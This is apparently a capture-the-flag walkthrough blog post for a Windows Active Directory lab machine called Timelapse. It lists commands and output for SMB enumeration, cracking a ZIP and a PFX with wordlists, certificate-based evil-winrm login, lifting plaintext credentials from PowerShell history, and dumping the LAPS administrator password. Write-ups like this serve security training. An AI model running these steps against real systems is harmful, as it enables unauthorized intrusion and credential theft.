Hi everyone! This is a Windows machine that only test Active Directory related content during privilege escalation. For initial access, we have to enumerate SMB for a password protected ZIP file which stores a password protected PFX file. Cracking using zip2john and crackpkcs12 was done before generating a public and private key using the PFX file for winrm login. Once login, we will have to enumerate PowerShell’s command history’s file to pivot to another account that has LAPS read access. With LAPS read access, we will be able to obtain the local administrator’s password. Let’s get started!
1. Nmap enumeration
$ sudo nmap -sC -sV -p- 10.10.11.152 PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-07-15 10:09:34Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open ldapssl? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name) 3269/tcp open globalcatLDAPssl? 5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found | ssl-cert: Subject: commonName=dc01.timelapse.htb | Not valid before: 2021-10-25T14:05:29 |_Not valid after: 2022-10-25T14:25:29 |_ssl-date: 2022-07-15T10:11:07+00:00; +7h59m59s from scanner time. | tls-alpn: |_ http/1.1 9389/tcp open mc-nmf .NET Message Framing 49667/tcp open msrpc Microsoft Windows RPC 49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49674/tcp open msrpc Microsoft Windows RPC 49696/tcp open msrpc Microsoft Windows RPC 56370/tcp open msrpc Microsoft Windows RPC Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 7h59m58s, deviation: 0s, median: 7h59m57s | smb2-security-mode: | 2.02: |_ Message signing enabled and required | smb2-time: | date: 2022-07-15T10:10:30 |_ start_date: N/A
2. SMB enumeration
Since port 445 is open, I decided to check it out if we can view any content anonymously. True enough, we can read “Shares” folder. When accessing the shared folder (just press ENTER when prompted for password), I found two interesting files. A backup file for winrm and LAPS. Knowing that LAPS exist will probably be helpful for privilege escalation later.
$ smbmap -H 10.10.11.152 -u anonymous [+] Guest session IP: 10.10.11.152:445 Name: 10.10.11.152 Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC NETLOGON NO ACCESS Logon server share Shares READ ONLY SYSVOL NO ACCESS Logon server share $ smbclient \\\\10.10.11.152\\Shares Enter WORKGROUP\kali's password: smb: \> dir . D 0 Mon Oct 25 11:39:15 2021 .. D 0 Mon Oct 25 11:39:15 2021 Dev D 0 Mon Oct 25 15:40:06 2021 HelpDesk D 0 Mon Oct 25 11:48:42 2021 6367231 blocks of size 4096. 2455198 blocks available smb: \> cd Dev smb: \Dev\> dir . D 0 Mon Oct 25 15:40:06 2021 .. D 0 Mon Oct 25 15:40:06 2021 winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021 6367231 blocks of size 4096. 2455198 blocks available smb: \Dev\> get winrm_backup.zip getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (3.6 KiloBytes/sec) (average 3.6 KiloBytes/sec) smb: \Dev\> cd .. smb: \> cd HelpDesk\ smb: \HelpDesk\> dir . D 0 Mon Oct 25 11:48:42 2021 .. D 0 Mon Oct 25 11:48:42 2021 LAPS.x64.msi A 1118208 Mon Oct 25 10:57:50 2021 LAPS_Datasheet.docx A 104422 Mon Oct 25 10:57:46 2021 LAPS_OperationsGuide.docx A 641378 Mon Oct 25 10:57:40 2021 LAPS_TechnicalSpecification.docx A 72683 Mon Oct 25 10:57:44 2021
3. Analysis winrm_backup.zip
3.1 Crack and access winrm_backup.zip
When I tried to unzip the ZIP file, it prompted us for a password.
$ unzip winrm_backup.zip Archive: winrm_backup.zip [winrm_backup.zip] legacyy_dev_auth.pfx password:
We can easily crack the ZIP file using zip2john.
$ zip2john ./winrm_backup.zip > zip.hashes $ sudo gunzip /usr/share/wordlists/rockyou.txt.gz $ john ./zip.hashes --wordlist=/usr/share/wordlists/rockyou.txt Using default input encoding: UTF-8 Loaded 1 password hash (PKZIP [32/64]) Will run 4 OpenMP threads Press 'q' or Ctrl-C to abort, almost any other key for status supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx) 1g 0:00:00:00 DONE (2022-07-14 23:28) 3.125g/s 10854Kp/s 10854Kc/s 10854KC/s surfroxy154..supergay01 Use the "--show" option to display all of the cracked passwords reliably Session completed $ unzip winrm_backup.zip Archive: winrm_backup.zip [winrm_backup.zip] legacyy_dev_auth.pfx password: supremelegacy inflating: legacyy_dev_auth.pfx
3.2 Crack and read .pfx file
When I tried to read the .pfx file, a password prompt appeared.
$ openssl pkcs12 -info -in ./legacyy_dev_auth.pfx Enter Import Password:
To crack the file, we will first have to install crackpkcs12. Copy and paste the following commands into the terminal.
git clone https://github.com/crackpkcs12/crackpkcs12.git cd crackpkcs12* ./configure make sudo make install
Finally, we can start to crack it.
$ cd .. $ crackpkcs12 -d /usr/share/wordlists/rockyou.txt ./legacyy_dev_auth.pfx Dictionary attack - Starting 4 threads ********************************************************* Dictionary attack - Thread 1 - Password found: thuglegacy *********************************************************
We can now generate the private and public keys since we have the password.
$ openssl pkcs12 -in ./legacyy_dev_auth.pfx -nocerts -out private.pem -nodes Enter Import Password: thuglegacy $ openssl pkcs12 -in ./legacyy_dev_auth.pfx -out public.pem -clcerts -nokeys Enter Import Password: thuglegacy
4. Initial access using winrm
We access the machine using evil-winrm along with our generated keys without the need for username or password. Ref: https://wadcoms.github.io/wadcoms/Evil-Winrm-PKINIT/
$ sudo gem install evil-winrm $ evil-winrm -i 10.10.11.152 -c public.pem -k private.pem -S -r timelapse Evil-WinRM shell v3.4 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Warning: SSL enabled Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\legacyy\Documents>
4.1 Obtaining the user flag
*Evil-WinRM* PS C:\Users\legacyy\Documents> cd ..\Desktop *Evil-WinRM* PS C:\Users\legacyy\Desktop> dir Directory: C:\Users\legacyy\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 7/15/2022 5:27 AM 34 user.txt *Evil-WinRM* PS C:\Users\legacyy\Desktop> type user.txt ca*****************************
5. Privilege escalation
5.1 Discovering another user
While looking at the user accounts available, I noticed that there is another interesting user, svc_deploy. Looking at svc_deploy, we can see that it is part of the LAPS_Readers group. I didn’t show legacyy or other user accounts’ information here but the all the other account we are in is not part of that group and hence it cannot read the local administrator’s password.
*Evil-WinRM* PS C:\Users\legacyy\Documents> net users User accounts for \\ ------------------------------------------------------------------------------- Administrator babywyrm Guest krbtgt legacyy payl0ad sinfulz svc_deploy thecybergeek The command completed with one or more errors. *Evil-WinRM* PS C:\Users\legacyy\Documents> net user svc_deploy User name svc_deploy Full Name svc_deploy Comment User's comment Country/region code 000 (System Default) Account active Yes Account expires Never Password last set 10/25/2021 12:12:37 PM Password expires Never Password changeable 10/26/2021 12:12:37 PM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 7/15/2022 5:57:46 AM Logon hours allowed All Local Group Memberships *Remote Management Use Global Group memberships *LAPS_Readers *Domain Users The command completed successfully.
5.2 Getting logging credentials via command history
While enumerating, I stumbled across svc_deploy‘s login credentials in PowerShell console’s history.
*Evil-WinRM* PS C:\Users\legacyy\Documents> type C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt whoami ipconfig /all netstat -ano |select-string LIST $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) invoke-command -computername localhost -credential $c -port 5986 -usessl - SessionOption $so -scriptblock {whoami} get-aduser -filter * -properties * exit
5.3 Login as svc_deploy
$ evil-winrm -i 10.10.11.152 -u svc_deploy -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S -r timelapse -s /home/kali Evil-WinRM shell v3.4 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Warning: SSL enabled Warning: User is not needed for Kerberos auth. Ticket will be used Warning: Password is not needed for Kerberos auth. Ticket will be used Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\svc_deploy\Documents>
5.4 Obtaining local admin’s password via LAPS
We can easily obtain LAPS password via this available Get-LAPSPasswords.ps1 script. Remember to download into your attacking machine before loading the script and run it. I already set the script path via -s flag in evil-winrm before logging in to svc_deploy‘s account.
*Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-LAPSPasswords.ps1 *Evil-WinRM* PS C:\Users\svc_deploy\Documents> Get-LAPSPasswords Hostname : dc01.timelapse.htb Stored : 1 Readable : 1 Password : }-%o9e8]&333-n+(VEi30J-} Expiration : 7/20/2022 10:52:04 AM Hostname : dc01.timelapse.htb Stored : 1 Readable : 1 Password : }-%o9e8]&333-n+(VEi30J-} Expiration : 7/20/2022 10:52:04 AM Hostname : Stored : 0 Readable : 0 Password : Expiration : NA Hostname : dc01.timelapse.htb Stored : 1 Readable : 1 Password : }-%o9e8]&333-n+(VEi30J-} Expiration : 7/20/2022 10:52:04 AM Hostname : Stored : 0 Readable : 0 Password : Expiration : NA Hostname : Stored : 0 Readable : 0 Password : Expiration : NA Hostname : dc01.timelapse.htb Stored : 1 Readable : 1 Password : }-%o9e8]&333-n+(VEi30J-} Expiration : 7/20/2022 10:52:04 AM Hostname : Stored : 0 Readable : 0 Password : Expiration : NA Hostname : Stored : 0 Readable : 0 Password : Expiration : NA Hostname : Stored : 0 Readable : 0 Password : Expiration : NA
Note that since the password is auto generated, your obtained password for the local administrator will definitely be different from mine. You will have to login to svc_deploy‘s account to retrieve the local administrator’s password.
5.5 Login as administrator
Since we have the password, we can now login as Administrator.
$ evil-winrm -i 10.10.11.152 -u administrator -p '}-%o9e8]&333-n+(VEi30J-}' -S -r timelapse Evil-WinRM shell v3.4 Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion Warning: SSL enabled Warning: User is not needed for Kerberos auth. Ticket will be used Warning: Password is not needed for Kerberos auth. Ticket will be used Info: Establishing connection to remote endpoint *Evil-WinRM* PS C:\Users\Administrator\Documents>
5.6 Obtaining the root flag
*Evil-WinRM* PS C:\Users\Administrator\Documents> dir C:\Users Directory: C:\Users Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 10/23/2021 11:27 AM Administrator d----- 10/25/2021 8:22 AM legacyy d-r--- 10/23/2021 11:27 AM Public d----- 10/25/2021 12:23 PM svc_deploy d----- 2/23/2022 5:45 PM TRX *Evil-WinRM* PS C:\Users\Administrator\Documents> cd C:\Users\TRX\Desktop *Evil-WinRM* PS C:\Users\TRX\Desktop> dir Directory: C:\Users\TRX\Desktop Mode LastWriteTime Length Name ---- ------------- ------ ---- -ar--- 7/15/2022 10:52 AM 34 root.txt *Evil-WinRM* PS C:\Users\TRX\Desktop> type root.txt a5*****************************
I hope these tabs have been helpful to you. Feel free to leave any comments below. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction. The link is here. 🙂
Lamecarrot 